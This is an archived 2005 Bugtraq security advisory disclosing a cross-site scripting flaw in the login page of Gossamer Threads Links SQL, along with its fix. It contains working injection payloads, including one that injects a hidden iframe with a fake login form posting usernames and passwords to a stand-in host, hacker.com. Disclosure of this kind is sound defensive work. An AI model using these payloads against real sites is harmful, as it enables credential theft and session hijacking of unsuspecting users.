[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Gossamer Threads Links SQL login XSS Vulnerability
From:       Nathan House <nhouse () stationx ! net>
Date:       2005-05-04 9:12:02
Message-ID: 20050504091202.23541.qmail () www ! securityfocus ! com
[Download RAW message or body]



Gossamer Threads Links SQL login XSS Vulnerability

Class 
Input Validation XSS

Remote	Local	Published / Updated
Yes	Yes	04th May 2005

Vulnerable
Vulnerable: Gossamer Threads Links SQL v3.0
   + Links SQL 2.x
   + Links SQL 2.2.x
   + Links SQL 3.0


Not Vulnerable
-

Discussion
Links SQL is a perl/mod_perl/PHP web application written by Gossamer Threads and is \
used to build any type of directory. Although designed to manage links, Links SQL is \
very customisable and is used all over the Internet for a wide range of tasks such as \
Image Galleries, Press Releases, Yellowpages, Company Directories, and other \
categorised databases. 

The URL variable in the Gossamer Threads Links SQL login page (user.cgi) is a hidden \
field in the login form and can be passed directly to user.cgi in the form of \
user.cgi?url="xyz" The URL variable is client side input created by the browser when \
a user clicks on a link which requires authentication. After authentication the user \
is redirected to the URL in the URL variable.  This URL variable does not \
sufficiently validate the client side input and is therefore vulnerable to script \
injection and cross site scripting (XSS) attacks. 


Exploit
This is a standard XSS vulnerability.

Note an attacker would normally obfuscate the linking code but for these examples I \
have made it simple for the sake of understanding.

Simple Example 1 (Pop up)
/user.cgi?url=">&lt;script&gt;alert("XSS Vulnerability")&lt;/script&gt;<"&from=rate

Resulting in the following within the HTML being injected:
<input type="hidden" name="url" value="">&lt;script&gt;alert("XSS \
Vulnerability")&lt;/script&gt;<"" />


Simple Example 2 (iframe to steal username and password)
/user.cgi?url="><iframe%20src="http://www.stationx.net/linksql.html"%20scrolling="No"% \
20align="MIDDLE"%20width="100%"%20height="3000"%20frameborder="No"></iframe><!--&from=rate



Example 2 produces an invisible iframe presenting a fake login screen to collect \
usernames and passwords with the following HTML injected; <form \
action="http://hacker.com/getusernameandpassword.cgi" method="post">

The &lt;script&gt; content is limited by the imagination of the attacker and the \
above are just two examples.

Like all XSS vulnerabilities this is a user attack only and not an attack on the \
system (Links SQL). Although if the user happens to be the links sql moderator/admin \
this user attack could be used to escalate privilege to then attack links sql.

To exploit this XSS vulnerability the victim must be tricked into making the above or \
other carefully crafted HTTP request. There are several ways users can be tricked to \
do this but common methods include via a link in an HTML aware email, a web based \
forum (Gossamer Threads forum) or embedded in a malicious web page.

XSS attacks are often demonstrated harvesting cookies to perform session hijacking \
and gather other sensitive information.


Solution
A new release has been created to fix this problem. Upgrade to Gossamer Links 3.0.1

http://www.gossamer-threads.com/forum/Gossamer_Links_3.0.1_Released_P280986/

http://gossamer-threads.com/perl/gforum/gforum.cgi?post=281029;


Credit
Nathan House @ StationX


References
http://www.stationx.net
http://www.stationx.net/advisories.php
http://www.gossamer-threads.com/scripts/links-sql/index.htm




Legal Notice
Copyright (©) 2005 StationX (UK) ltd. Referred to as “StationX” further more.
This advisory written by StationX can be distributed freely electronically without \
permission from StationX. This advisory may not be altered without the express \
written permission of StationX. If you wish to print this advisory whole or in part \
in any none electronic form please contact StationX for consent.

Disclaimer
This advisory to the best of our knowledge and given current information is correct \
and accurate at the date given above “Published / Updated”.  Use of any information \
in this advisory is for informational purposes only to help further the development \
of the security industry and help further secure systems. The information in the \
advisory should NOT be used adversely. StationX, the author and any publishers gives \
no guarantees or warranties at all with regards to any information in this advisory. \
Under no circumstances shall StationX, the author and any publishers be liable in \
contract, tort, or otherwise, for any loss or damage whatsoever arising from use of \
or in any way connected with this advisory or any hyperlinked website, including, \
without limitation, damages for loss of business, loss of profits, business \
interruption, loss of business information, loss of programs or other data on the \
user's information handling system or otherwise maintained, or any other pecuniar  y \
loss (even where StationX, the author and any publishers has been advised of the \
possibility of such loss or damage arising).


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic